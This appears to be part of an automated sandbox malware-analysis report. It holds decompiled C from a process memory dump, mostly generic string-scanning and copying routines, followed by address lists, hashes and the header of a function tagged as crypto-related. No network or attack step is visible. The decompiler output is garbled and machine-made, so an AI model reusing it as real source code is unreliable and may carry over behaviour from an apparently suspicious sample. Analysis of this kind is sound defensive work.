																__eflags = _t284;
																if(_t284 != 0) {
																	break;
																}
																_t206 = _t206 + 0x10;
																__eflags = _t206 - _t394;
																if(_t206 < _t394) {
																	continue;
																} else {
																	__eflags = _t394 - 0x7fffffff;
																	if(_t394 >= 0x7fffffff) {
																		L100:
																		_t394 = 0x7fffffff;
																	} else {
																		while(1) {
																			__eflags =  *((char*)(_t394 + _t317));
																			if( *((char*)(_t394 + _t317)) == 0) {
																				goto L101;
																			}
																			_t394 = _t394 + 1;
																			__eflags = _t394 - 0x7fffffff;
																			if(_t394 < 0x7fffffff) {
																				continue;
																			} else {
																				goto L100;
																			}
																			goto L101;
																		}
																	}
																}
																goto L101;
															}
															asm("bsf esi, ecx");
															_t394 = _t394 + _t206;
														} else {
															_t394 = 0;
															_t206 =  ~_t206 + 0x10;
															__eflags = _t206;
															while(1) {
																__eflags =  *((char*)(_t394 + _t317));
																if( *((char*)(_t394 + _t317)) == 0) {
																	goto L101;
																}
																_t394 = _t394 + 1;
																__eflags = _t394 - _t206;
																if(_t394 < _t206) {
																	continue;
																} else {
																	goto L94;
																}
																goto L101;
															}
														}
														L101:
														__eflags = _t262;
														if(_t262 == 0) {
															_t207 = 0;
														} else {
															_t295 = _t262 & 0x0000000f;
															__eflags = _t295;
															if(_t295 == 0) {
																L106:
																asm("pxor xmm1, xmm1");
																_v32 = _t348;
																_t207 =  ~( ~_t295 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t207;
																while(1) {
																	asm("movdqu xmm0, [ebx+ecx]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb edi, xmm0");
																	__eflags = _t348;
																	if(_t348 != 0) {
																		break;
																	}
																	_t295 = _t295 + 0x10;
																	__eflags = _t295 - _t207;
																	if(_t295 < _t207) {
																		continue;
																	} else {
																		_t348 = _v32;
																		__eflags = _t207 - 0x7fffffff;
																		if(_t207 >= 0x7fffffff) {
																			L112:
																			_t207 = 0x7fffffff;
																		} else {
																			while(1) {
																				__eflags =  *((char*)(_t207 + _t262));
																				if( *((char*)(_t207 + _t262)) == 0) {
																					goto L113;
																				}
																				_t207 = _t207 + 1;
																				__eflags = _t207 - 0x7fffffff;
																				if(_t207 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L112;
																				}
																				goto L113;
																			}
																		}
																	}
																	goto L113;
																}
																_t237 = _t348;
																asm("bsf eax, eax");
																_t348 = _v32;
																_t207 = _t237 + _t295;
															} else {
																_t207 = 0;
																_t295 =  ~_t295 + 0x10;
																__eflags = _t295;
																while(1) {
																	__eflags =  *((char*)(_t207 + _t262));
																	if( *((char*)(_t207 + _t262)) == 0) {
																		goto L113;
																	}
																	_t207 = _t207 + 1;
																	__eflags = _t207 - _t295;
																	if(_t207 < _t295) {
																		continue;
																	} else {
																		goto L106;
																	}
																	goto L113;
																}
															}
														}
														L113:
														_t92 = _t207 + 1; // 0x80000000
														_t287 = _t394 + _t92;
														__eflags = _t287;
														if(_t287 != 0) {
															__eflags = _t287 - 0x40;
															_t288 =  <=  ? 0x40 : _t287;
															__eflags = _t348 - _t288;
															if(_t348 < _t288) {
																goto L119;
															}
															goto L131;
														} else {
															__eflags = _t262;
															if(_t262 == 0) {
																__eflags = _t348 - 0x40;
																if(_t348 < 0x40) {
																	goto L117;
																} else {
																	goto L184;
																}
															} else {
																 *_t262 = 0;
																_t221 = 0;
																__eflags = _t348 - 0x40;
																if(_t348 < 0x40) {
																	L117:
																	_t288 = 0x40;
																	L119:
																	_t354 = (_t288 >> 5 >> 0x1a) + _t288 >> 6;
																	_t290 = _t288 & 0x8000003f;
																	__eflags = _t290;
																	if(_t290 < 0) {
																		_t290 = (_t290 - 0x00000001 | 0xffffffc0) + 1;
																		__eflags = _t290;
																	}
																	__eflags = _t290;
																	_t348 = _t354 + (0 | _t290 > 0x00000000) << 6;
																	_push(_t348);
																	_v56 = _t317;
																	_t228 = E003B1030();
																	_t317 = _v56;
																	_v52 = _t228;
																	_t399 = _t399 + 4;
																	__eflags = _t262;
																	if(_t262 == 0) {
																		 *_t228 = 0;
																	} else {
																		__eflags = _v52;
																		if(_v52 != 0) {
																			_t291 = _t228;
																			_t230 =  *_t262;
																			 *_t291 = _t230;
																			__eflags = _t230;
																			if(_t230 != 0) {
																				_v68 = _t394;
																				_t231 = 0;
																				__eflags = 0;
																				_v56 = _t317;
																				_v32 = _t348;
																				while(1) {
																					_t231 = _t231 + 1;
																					_t332 =  *((char*)(_t262 + _t231 * 2 - 1));
																					 *(_t291 + _t231 * 2 - 1) = _t332;
																					__eflags = _t332;
																					if(_t332 == 0) {
																						break;
																					}
																					_t333 =  *((char*)(_t262 + _t231 * 2));
																					 *(_t291 + _t231 * 2) = _t333;
																					__eflags = _t333;
																					if(_t333 != 0) {
																						continue;
																					}
																					break;
																				}
																				_t394 = _v68;
																				_t317 = _v56;
																				_t348 = _v32;
																			}
																		}
																		_push(1);
																		_push(_t262);
																		_v56 = _t317;
																		E003B10B0();
																		_t317 = _v56;
																		_t399 = _t399 + 8;
																	}
																	_t262 = _v52;
																	L131:
																	_t289 = _t262;
																	__eflags = _t262;
																	if(_t262 == 0) {
																		L184:
																		_t210 = _v36 + 1;
																		_v36 = _t210;
																		__eflags = _t210 -  *_v40;
																		if(_t210 >=  *_v40) {
																			_t329 = _a4;
																			 *_t329 = 0;
																			 *((intOrPtr*)(_t329 + 4)) = 0;
																			goto L79;
																		} else {
																			__eflags = _a8;
																			if(_a8 != 0) {
																				goto L180;
																			} else {
																				continue;
																			}
																			goto L194;
																		}
																	} else {
																		_t221 =  *_t262;
																		goto L133;
																	}
																} else {
																	_t289 = _t262;
																	L133:
																	__eflags = _t221;
																	if(_t221 != 0) {
																		_v32 = _t348;
																		_t225 = 0;
																		__eflags = 0;
																		while(1) {
																			_t225 = _t225 + 1;
																			_t356 = _t262 + _t225 * 2;
																			__eflags =  *(_t356 - 1);
																			_t120 = _t356 - 1; // 0x7fffffff
																			_t289 = _t120;
																			if( *(_t356 - 1) == 0) {
																				break;
																			}
																			_t289 = _t356;
																			__eflags =  *_t356;
																			if( *_t356 != 0) {
																				continue;
																			}
																			break;
																		}
																		_t348 = _v32;
																	}
																	_t222 = _t289;
																	__eflags = _t394;
																	if(__eflags != 0) {
																		if(__eflags > 0) {
																			goto L141;
																		}
																	} else {
																		_t394 = 0x7fffffff;
																		L141:
																		_v44 = 0;
																		_v32 = _t348;
																		_v48 = _t262;
																		_t349 = _v44;
																		while(1) {
																			_t265 =  *((char*)(_t349 + _t317));
																			 *(_t349 + _t222) = _t265;
																			__eflags = _t265;
																			if(_t265 == 0) {
																				break;
																			}
																			_t129 = _t222 + 1; // 0x1
																			_t289 = _t349 + _t129;
																			_t349 = _t349 + 1;
																			__eflags = _t349 - _t394;
																			if(_t349 < _t394) {
																				continue;
																			}
																			break;
																		}
																		_t348 = _v32;
																		_t262 = _v48;
																	}
																	_t224 = _v36 + 1;
																	 *_t289 = 0;
																	_v36 = _t224;
																	__eflags = _t224 -  *_v40;
																	if(_t224 >=  *_v40) {
																		L174:
																		_t331 = _a4;
																		_t183 = 0;
																		 *_t331 = 0;
																		 *((intOrPtr*)(_t331 + 4)) = 0;
																		L46:
																		__eflags =  *_t262;
																		if( *_t262 == 0) {
																			L79:
																			_push(0x40);
																			_t373 = E003B1030();
																			_t399 = _t399 + 4;
																			_t186 =  *_a4;
																			__eflags = _t186;
																			if(_t186 == 0) {
																				 *_t373 = 0;
																			} else {
																				__eflags = _t373;
																				if(_t373 != 0) {
																					_t303 =  *_t186;
																					 *_t373 = _t303;
																					__eflags = _t303;
																					if(_t303 != 0) {
																						_t281 = 0;
																						__eflags = 0;
																						while(1) {
																							_t281 = _t281 + 1;
																							_t304 =  *((char*)(_t186 + _t281 * 2 - 1));
																							 *(_t373 + _t281 * 2 - 1) = _t304;
																							__eflags = _t304;
																							if(_t304 == 0) {
																								goto L85;
																							}
																							_t305 =  *((char*)(_t186 + _t281 * 2));
																							 *(_t373 + _t281 * 2) = _t305;
																							__eflags = _t305;
																							if(_t305 != 0) {
																								continue;
																							}
																							goto L85;
																						}
																					}
																				}
																				L85:
																				_push(1);
																				_push(_t186);
																				E003B10B0();
																				_t399 = _t399 + 8;
																			}
																			_t187 = _a4;
																			 *_t187 = _t373;
																			_t187[1] = 0x40;
																		} else {
																			_t307 = _t262 & 0x0000000f;
																			__eflags = _t307;
																			if(_t307 == 0) {
																				L51:
																				asm("pxor xmm0, xmm0");
																				_t380 =  ~( ~_t307 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t380;
																				while(1) {
																					asm("movdqu xmm1, [ebx+edx]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb eax, xmm1");
																					__eflags = _t183;
																					if(_t183 != 0) {
																						break;
																					}
																					_t307 = _t307 + 0x10;
																					__eflags = _t307 - _t380;
																					if(_t307 < _t380) {
																						continue;
																					} else {
																						__eflags = _t380 - 0x7fffffff;
																						if(_t380 >= 0x7fffffff) {
																							L57:
																							_t380 = 0x7fffffff;
																						} else {
																							while(1) {
																								__eflags =  *((char*)(_t380 + _t262));
																								if( *((char*)(_t380 + _t262)) == 0) {
																									goto L58;
																								}
																								_t380 = _t380 + 1;
																								__eflags = _t380 - 0x7fffffff;
																								if(_t380 < 0x7fffffff) {
																									continue;
																								} else {
																									goto L57;
																								}
																								goto L58;
																							}
																						}
																					}
																					goto L58;
																				}
																				asm("bsf esi, eax");
																				_t380 = _t380 + _t307;
																			} else {
																				_t380 = 0;
																				_t307 =  ~_t307 + 0x10;
																				__eflags = _t307;
																				while(1) {
																					__eflags =  *((char*)(_t380 + _t262));
																					if( *((char*)(_t380 + _t262)) == 0) {
																						goto L58;
																					}
																					_t380 = _t380 + 1;
																					__eflags = _t380 - _t307;
																					if(_t380 < _t307) {
																						continue;
																					} else {
																						goto L51;
																					}
																					goto L58;
																				}
																			}
																			L58:
																			_t51 = _t380 + 1; // 0x80000000
																			_t308 = _t51;
																			__eflags = _t308 - 0x40;
																			_t309 =  <=  ? 0x40 : _t308;
																			__eflags = _t309;
																			if(_t309 > 0) {
																				_t344 = (_t309 >> 5 >> 0x1a) + _t309 >> 6;
																				_t310 = _t309 & 0x8000003f;
																				__eflags = _t310;
																				if(_t310 < 0) {
																					_t310 = (_t310 - 0x00000001 | 0xffffffc0) + 1;
																					__eflags = _t310;
																				}
																				__eflags = _t310;
																				_t346 = _t344 + (0 | _t310 > 0x00000000) << 6;
																				_push(_t346);
																				_t311 = E003B1030();
																				_t399 = _t399 + 4;
																				_t282 =  *_a4;
																				__eflags = _t282;
																				if(_t282 == 0) {
																					 *_t311 = 0;
																				} else {
																					__eflags = _t311;
																					if(_t311 != 0) {
																						_t199 =  *_t282;
																						 *_t311 = _t199;
																						__eflags = _t199;
																						if(_t199 != 0) {
																							__eflags = 0;
																							_v68 = _t380;
																							_v48 = _t262;
																							_t264 = 0;
																							while(1) {
																								_t264 = _t264 + 1;
																								_t201 =  *((char*)(_t282 + _t264 * 2 - 1));
																								 *(_t311 + _t264 * 2 - 1) = _t201;
																								__eflags = _t201;
																								if(_t201 == 0) {
																									break;
																								}
																								_t202 =  *((char*)(_t282 + _t264 * 2));
																								 *(_t311 + _t264 * 2) = _t202;
																								__eflags = _t202;
																								if(_t202 != 0) {
																									continue;
																								}
																								break;
																							}
																							_t380 = _v68;
																							_t262 = _v48;
																						}
																					}
																					_push(1);
																					_push(_t282);
																					_v68 = _t311;
																					E003B10B0();
																					_t311 = _v68;
																					_t399 = _t399 + 8;
																				}
																				_t196 = _a4;
																				_t196[1] = _t346;
																				 *_t196 = _t311;
																			} else {
																				_t311 = 0;
																			}
																			_t283 = _t262;
																			__eflags = _t311;
																			if(_t311 != 0) {
																				_t347 = 0;
																				while(1) {
																					_t197 =  *_t283;
																					_t347 = _t347 + 1;
																					 *_t311 = _t197;
																					__eflags = _t380;
																					if(_t380 == 0) {
																						goto L77;
																					}
																					__eflags = _t347 - _t380;
																					if(_t347 == _t380) {
																						 *(_t311 + 1) = 0;
																					} else {
																						goto L77;
																					}
																					goto L88;
																					L77:
																					__eflags = _t197;
																					if(_t197 != 0) {
																						_t311 = _t311 + 1;
																						_t283 = _t283 + 1;
																						__eflags = _t283;
																						continue;
																					}
																					goto L88;
																				}
																			}
																		}
																	} else {
																		_t203 = _a8;
																		__eflags = _t203;
																		if(_t203 == 0) {
																			continue;
																		} else {
																			goto L147;
																		}
																		goto L194;
																	}
																}
															}
														}
													}
												} else {
													goto L44;
												}
												goto L88;
											}
											goto L44;
										}
										goto L42;
										L44:
										_t372 = _t204;
										_t203 = _a8;
										_t315 = _t284 + 1;
										__eflags = _t315 -  *_t372;
									} while (_t315 <  *_t372);
									goto L45;
								}
							}
						}
					}
					L88:
					_push(1);
					_push(_t262);
					E003B10B0();
					return _a4;
				} else {
					_t335 = _a4;
					_push(0x40);
					 *_t335 = 0;
					 *((intOrPtr*)(_t335 + 4)) = 0;
					_t277 = E003B1030();
					_t401 = _t399 + 4;
					_t258 =  *_a4;
					if(_t258 == 0) {
						 *_t277 = 0;
					} else {
						if(_t277 != 0) {
							_t336 =  *_t258;
							 *_t277 = _t336;
							if(_t336 != 0) {
								_t337 = 0;
								while(1) {
									_t337 = _t337 + 1;
									_t298 =  *((char*)(_t258 + _t337 * 2 - 1));
									 *((char*)(_t277 + _t337 * 2 - 1)) = _t298;
									if(_t298 == 0) {
										goto L7;
									}
									_t299 =  *((char*)(_t258 + _t337 * 2));
									 *((char*)(_t277 + _t337 * 2)) = _t299;
									if(_t299 != 0) {
										continue;
									}
									goto L7;
								}
							}
						}
						L7:
						_push(1);
						_push(_t258);
						E003B10B0();
						_t401 = _t401 + 8;
					}
					_t259 = _a4;
					_t259[1] = 0x40;
					 *_t259 = _t277;
					return _t259;
				}
				L194:
			}

0x003c7fc9
0x003c7fcc
0x003c7fce
0x003c7fd2
0x003c8048
0x003c804a
0x003c804c
0x003c818b
0x003c818b
0x003c8192
0x003c8194
0x003c8197
0x003c819a
0x003c819d
0x00000000
0x003c819f
0x003c819f
0x00000000
0x003c819f
0x003c8052
0x003c8052
0x003c8055
0x00000000
0x003c805b
0x003c805d
0x003c805d
0x003c8060
0x003c8082
0x003c8086
0x003c8092
0x003c8092
0x003c8098
0x003c809c
0x003c809e
0x003c809e
0x003c80a3
0x003c80a7
0x003c80ab
0x003c80ad
0x00000000
0x00000000
0x003c80b3
0x003c80b6
0x003c80b8
0x00000000
0x003c80ba
0x003c80ba
0x003c80be
0x003c80c6
0x003c80dc
0x003c80dc
0x003c80c8
0x003c80c8
0x003c80ca
0x003c80ca
0x003c80ce
0x00000000
0x00000000
0x003c80d4
0x003c80d5
0x003c80da
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c80da
0x003c8762
0x003c8762
0x003c80c6
0x00000000
0x003c80b8
0x003c876b
0x003c8770
0x003c8062
0x003c8062
0x003c806c
0x003c8070
0x003c8070
0x003c8073
0x003c8073
0x003c8077
0x00000000
0x00000000
0x003c807d
0x003c807e
0x003c8080
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8080
0x003c8779
0x003c8779
0x003c80e4
0x003c80ed
0x003c80f0
0x003c80f3
0x003c80f6
0x003c80f8
0x003c8116
0x003c8119
0x003c8119
0x003c811e
0x003c8126
0x003c8126
0x003c8126
0x003c8127
0x003c8133
0x003c8136
0x003c8137
0x003c813b
0x003c8140
0x003c8144
0x003c8146
0x003c814d
0x003c8155
0x003c8159
0x003c815d
0x003c8160
0x003c8163
0x003c8167
0x003c816f
0x003c816f
0x003c8172
0x003c8173
0x003c8175
0x003c8177
0x00000000
0x00000000
0x003c8179
0x003c817b
0x003c872e
0x003c8732
0x003c8735
0x003c8739
0x00000000
0x00000000
0x00000000
0x003c873d
0x003c873d
0x003c8740
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8181
0x003c8181
0x003c8183
0x003c8755
0x003c8759
0x003c875c
0x003c8189
0x003c816d
0x003c816e
0x003c816e
0x00000000
0x003c816e
0x00000000
0x003c8183
0x003c80fa
0x003c80fa
0x003c80fc
0x003c80ff
0x003c81fc
0x003c81fc
0x003c81ff
0x003c8201
0x003c8203
0x003c8206
0x003c8208
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8105
0x003c8105
0x003c81a4
0x003c81a4
0x003c81a8
0x003c81ad
0x003c81b1
0x003c81b1
0x003c81b3
0x003c81ca
0x003c81ce
0x003c81b5
0x003c81b5
0x003c81b7
0x003c8782
0x003c8786
0x003c878a
0x003c878a
0x003c81bd
0x003c81bd
0x003c81c1
0x003c860f
0x003c8611
0x003c8611
0x003c8614
0x003c862c
0x003c8630
0x003c863c
0x003c863c
0x003c8642
0x003c8642
0x003c8647
0x003c864b
0x003c864f
0x003c8651
0x00000000
0x00000000
0x003c8657
0x003c865a
0x003c865c
0x00000000
0x003c865e
0x003c865e
0x003c8664
0x003c8679
0x003c8679
0x003c8666
0x003c8666
0x003c8666
0x003c866a
0x00000000
0x00000000
0x003c8670
0x003c8671
0x003c8677
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8677
0x00000000
0x003c8666
0x003c8664
0x00000000
0x003c865c
0x003c87eb
0x003c87ee
0x00000000
0x003c8616
0x003c8618
0x003c861a
0x003c861a
0x003c861d
0x003c861d
0x003c8621
0x00000000
0x00000000
0x003c8627
0x003c8628
0x003c862a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c862a
0x003c87da
0x003c87da
0x003c87dd
0x003c87e3
0x003c87e3
0x003c87dd
0x003c8614
0x003c867e
0x003c8683
0x003c8683
0x003c8686
0x003c8689
0x003c868c
0x003c868e
0x003c869e
0x003c86a1
0x003c86a1
0x003c86a7
0x003c86af
0x003c86af
0x003c86af
0x003c86b2
0x003c86b9
0x003c86bc
0x003c86c2
0x003c86c4
0x003c86c7
0x003c86c9
0x003c8718
0x003c86cb
0x003c86cb
0x003c86cd
0x003c86cf
0x003c86d2
0x003c86d4
0x003c86d6
0x003c86d8
0x003c86dc
0x003c86dc
0x003c86de
0x003c86e2
0x003c86e2
0x003c86e3
0x003c86e8
0x003c86ec
0x003c86ee
0x00000000
0x00000000
0x003c86f0
0x003c86f4
0x003c86f7
0x003c86f9
0x00000000
0x00000000
0x00000000
0x003c86f9
0x003c86fb
0x003c86ff
0x003c86ff
0x003c86d6
0x003c8703
0x003c8705
0x003c8706
0x003c870a
0x003c870f
0x003c8713
0x003c8713
0x003c871b
0x003c871b
0x003c8721
0x003c8724
0x003c81d2
0x003c81d2
0x003c81d2
0x003c81d6
0x003c81e0
0x003c81e2
0x003c81e4
0x00000000
0x00000000
0x003c81e6
0x003c81e9
0x003c83bf
0x003c83c1
0x00000000
0x003c83c7
0x003c83c9
0x003c83c9
0x003c83cc
0x003c83e0
0x003c83e4
0x003c83f0
0x003c83f0
0x003c83f6
0x003c83f6
0x003c83fb
0x003c83ff
0x003c8403
0x003c8405
0x00000000
0x00000000
0x003c840b
0x003c840e
0x003c8410
0x00000000
0x003c8412
0x003c8412
0x003c8418
0x003c8429
0x003c8429
0x00000000
0x003c841a
0x003c841a
0x003c841e
0x00000000
0x00000000
0x003c8420
0x003c8421
0x003c8427
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8427
0x003c841a
0x003c8418
0x00000000
0x003c8410
0x003c8809
0x003c880c
0x003c83ce
0x003c83d0
0x003c83d2
0x003c83d2
0x003c83d5
0x003c83d5
0x003c83d9
0x00000000
0x00000000
0x003c83db
0x003c83dc
0x003c83de
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c83de
0x003c83d5
0x003c842e
0x003c842e
0x003c8430
0x003c8802
0x003c8436
0x003c8438
0x003c8438
0x003c843b
0x003c844f
0x003c8453
0x003c845f
0x003c8463
0x003c8463
0x003c8468
0x003c8468
0x003c846d
0x003c8471
0x003c8475
0x003c8477
0x00000000
0x00000000
0x003c847d
0x003c8480
0x003c8482
0x00000000
0x003c8484
0x003c8484
0x003c8488
0x003c848d
0x003c849d
0x003c849d
0x00000000
0x003c848f
0x003c848f
0x003c8493
0x00000000
0x00000000
0x003c8495
0x003c8496
0x003c849b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c849b
0x003c848f
0x003c848d
0x00000000
0x003c8482
0x003c87f2
0x003c87f4
0x003c87f7
0x003c87fb
0x003c843d
0x003c843f
0x003c8441
0x003c8441
0x003c8444
0x003c8444
0x003c8448
0x00000000
0x00000000
0x003c844a
0x003c844b
0x003c844d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c844d
0x003c8444
0x003c843b
0x003c84a2
0x003c84a2
0x003c84a2
0x003c84a6
0x003c84a8
0x003c84cf
0x003c84d2
0x003c84d5
0x003c84d7
0x00000000
0x00000000
0x00000000
0x003c84aa
0x003c84aa
0x003c84ac
0x003c87a4
0x003c87a7
0x00000000
0x00000000
0x00000000
0x00000000
0x003c84b2
0x003c84b2
0x003c84b5
0x003c84b7
0x003c84ba
0x003c84c3
0x003c84c3
0x003c84dd
0x003c84e7
0x003c84ea
0x003c84ea
0x003c84f0
0x003c84f8
0x003c84f8
0x003c84f8
0x003c84fb
0x003c8502
0x003c8505
0x003c8506
0x003c850a
0x003c850f
0x003c8513
0x003c8517
0x003c851a
0x003c851c
0x003c8576
0x003c851e
0x003c851e
0x003c8523
0x003c8525
0x003c8527
0x003c852a
0x003c852c
0x003c852e
0x003c8530
0x003c8533
0x003c8533
0x003c8535
0x003c8539
0x003c853d
0x003c853d
0x003c853e
0x003c8543
0x003c8547
0x003c8549
0x00000000
0x00000000
0x003c854b
0x003c854f
0x003c8552
0x003c8554
0x00000000
0x00000000
0x00000000
0x003c8554
0x003c8556
0x003c8559
0x003c855d
0x003c855d
0x003c852e
0x003c8561
0x003c8563
0x003c8564
0x003c8568
0x003c856d
0x003c8571
0x003c8571
0x003c8579
0x003c857d
0x003c857d
0x003c857f
0x003c8581
0x003c87ad
0x003c87b5
0x003c87b6
0x003c87ba
0x003c87bc
0x003c87cb
0x003c87d0
0x003c87d2
0x00000000
0x003c87be
0x003c87c2
0x003c87c4
0x00000000
0x003c87c6
0x00000000
0x003c87c6
0x00000000
0x003c87c4
0x003c8587
0x003c8587
0x00000000
0x003c8587
0x003c84bc
0x003c84bc
0x003c858a
0x003c858a
0x003c858c
0x003c858e
0x003c8592
0x003c8592
0x003c8594
0x003c8594
0x003c8595
0x003c8598
0x003c859c
0x003c859c
0x003c859f
0x00000000
0x00000000
0x003c85a1
0x003c85a3
0x003c85a6
0x00000000
0x00000000
0x00000000
0x003c85a6
0x003c85a8
0x003c85a8
0x003c85ac
0x003c85ae
0x003c85b0
0x003c85b9
0x00000000
0x00000000
0x003c85b2
0x003c85b2
0x003c85bb
0x003c85bb
0x003c85c3
0x003c85c7
0x003c85cb
0x003c85cf
0x003c85cf
0x003c85d3
0x003c85d6
0x003c85d8
0x00000000
0x00000000
0x003c85da
0x003c85da
0x003c85de
0x003c85df
0x003c85e1
0x00000000
0x00000000
0x00000000
0x003c85e1
0x003c85e3
0x003c85e7
0x003c85e7
0x003c85f3
0x003c85f4
0x003c85f7
0x003c85fb
0x003c85fd
0x003c8746
0x003c8746
0x003c8749
0x003c874b
0x003c874d
0x003c820e
0x003c820e
0x003c8211
0x003c834f
0x003c834f
0x003c8356
0x003c8358
0x003c835e
0x003c8360
0x003c8362
0x003c8399
0x003c8364
0x003c8364
0x003c8366
0x003c8368
0x003c836b
0x003c836d
0x003c836f
0x003c8371
0x003c8371
0x003c8373
0x003c8373
0x003c8374
0x003c8379
0x003c837d
0x003c837f
0x00000000
0x00000000
0x003c8381
0x003c8385
0x003c8388
0x003c838a
0x00000000
0x00000000
0x00000000
0x003c838a
0x003c8373
0x003c836f
0x003c838c
0x003c838c
0x003c838e
0x003c838f
0x003c8394
0x003c8394
0x003c839c
0x003c839f
0x003c83a1
0x003c8217
0x003c8219
0x003c8219
0x003c821c
0x003c8230
0x003c8234
0x003c8240
0x003c8240
0x003c8246
0x003c8246
0x003c824b
0x003c824f
0x003c8253
0x003c8255
0x00000000
0x00000000
0x003c825b
0x003c825e
0x003c8260
0x00000000
0x003c8262
0x003c8262
0x003c8268
0x003c8279
0x003c8279
0x00000000
0x003c826a
0x003c826a
0x003c826e
0x00000000
0x00000000
0x003c8270
0x003c8271
0x003c8277
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8277
0x003c826a
0x003c8268
0x00000000
0x003c8260
0x003c879a
0x003c879d
0x003c821e
0x003c8220
0x003c8222
0x003c8222
0x003c8225
0x003c8225
0x003c8229
0x00000000
0x00000000
0x003c822b
0x003c822c
0x003c822e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c822e
0x003c8225
0x003c827e
0x003c8283
0x003c8283
0x003c8286
0x003c8289
0x003c828c
0x003c828e
0x003c82a1
0x003c82a4
0x003c82a4
0x003c82aa
0x003c82b2
0x003c82b2
0x003c82b2
0x003c82b5
0x003c82bc
0x003c82bf
0x003c82c5
0x003c82c7
0x003c82cd
0x003c82cf
0x003c82d1
0x003c8320
0x003c82d3
0x003c82d3
0x003c82d5
0x003c82d7
0x003c82da
0x003c82dc
0x003c82de
0x003c82e0
0x003c82e2
0x003c82e5
0x003c82e9
0x003c82eb
0x003c82eb
0x003c82ec
0x003c82f1
0x003c82f5
0x003c82f7
0x00000000
0x00000000
0x003c82f9
0x003c82fd
0x003c8300
0x003c8302
0x00000000
0x00000000
0x00000000
0x003c8302
0x003c8304
0x003c8307
0x003c8307
0x003c82de
0x003c830b
0x003c830d
0x003c830e
0x003c8312
0x003c8317
0x003c831b
0x003c831b
0x003c8323
0x003c8326
0x003c8329
0x003c8290
0x003c8290
0x003c8290
0x003c832b
0x003c832d
0x003c832f
0x003c8331
0x003c8337
0x003c8337
0x003c833a
0x003c833b
0x003c833d
0x003c833f
0x00000000
0x00000000
0x003c8341
0x003c8343
0x003c8791
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8349
0x003c8349
0x003c834b
0x003c8335
0x003c8336
0x003c8336
0x00000000
0x003c8336
0x00000000
0x003c834b
0x003c8337
0x003c832f
0x003c8603
0x003c8603
0x003c8607
0x003c8609
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8609
0x003c85fd
0x003c84ba
0x003c84ac
0x003c84a8
0x00000000
0x00000000
0x00000000
0x00000000
0x003c81e9
0x00000000
0x003c81d2
0x00000000
0x003c81ef
0x003c81f1
0x003c81f3
0x003c81f7
0x003c81f8
0x003c81f8
0x00000000
0x003c81b1
0x003c80ff
0x003c80f8
0x003c8055
0x003c83a8
0x003c83a8
0x003c83aa
0x003c83ab
0x003c83bc
0x003c7fd4
0x003c7fd4
0x003c7fd9
0x003c7fdb
0x003c7fdd
0x003c7fe5
0x003c7fe7
0x003c7fed
0x003c7ff1
0x003c8028
0x003c7ff3
0x003c7ff5
0x003c7ff7
0x003c7ffa
0x003c7ffe
0x003c8000
0x003c8002
0x003c8002
0x003c8003
0x003c8008
0x003c800e
0x00000000
0x00000000
0x003c8010
0x003c8014
0x003c8019
0x00000000
0x00000000
0x00000000
0x003c8019
0x003c8002
0x003c7ffe
0x003c801b
0x003c801b
0x003c801d
0x003c801e
0x003c8023
0x003c8023
0x003c802b
0x003c802e
0x003c8035
0x003c8040
0x003c8040
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76acd60678bb96f26b5e0d37bd27300dfdf6a640e895f3b9d1efbfc3318f078
Instruction ID: 02058dd8f13b21b1ef137afcbffb1e3d11cf54c10f995d97e1393a6c31dfdc8e
Opcode Fuzzy Hash: c76acd60678bb96f26b5e0d37bd27300dfdf6a640e895f3b9d1efbfc3318f078
Instruction Fuzzy Hash: FD323B75A087924BD7178F398880B2A7BD6BFC6310F2A866DD895CB381DE74CE418781

Uniqueness

Uniqueness Score: -1.00%

Function 003B8EF0, Relevance: .7, Instructions: 697
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003B8EF0(signed int* __ecx, signed int* _a4, unsigned int _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t142;
				signed int* _t144;
				signed int _t147;
				unsigned int _t153;
				signed int _t154;
				signed int* _t159;
				void* _t160;
				signed int _t163;
				signed int _t164;
				signed int _t169;
				signed int _t173;
				signed int* _t175;
				signed int _t179;
				unsigned int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t206;
				signed int _t207;
				unsigned int _t216;
				signed int _t220;
				short* _t224;
				signed int _t226;
				signed int _t230;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t237;
				unsigned int _t242;
				signed int _t243;
				short* _t245;
				short _t246;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed short* _t255;
				void* _t256;
				signed int _t258;
				signed int _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr* _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t279;
				signed int _t284;
				intOrPtr* _t285;
				signed int _t286;
				signed int _t287;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				signed int* _t297;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t306;
				unsigned int _t311;
				signed int _t314;
				signed int _t316;
				void* _t317;
				signed int _t318;
				signed int _t319;
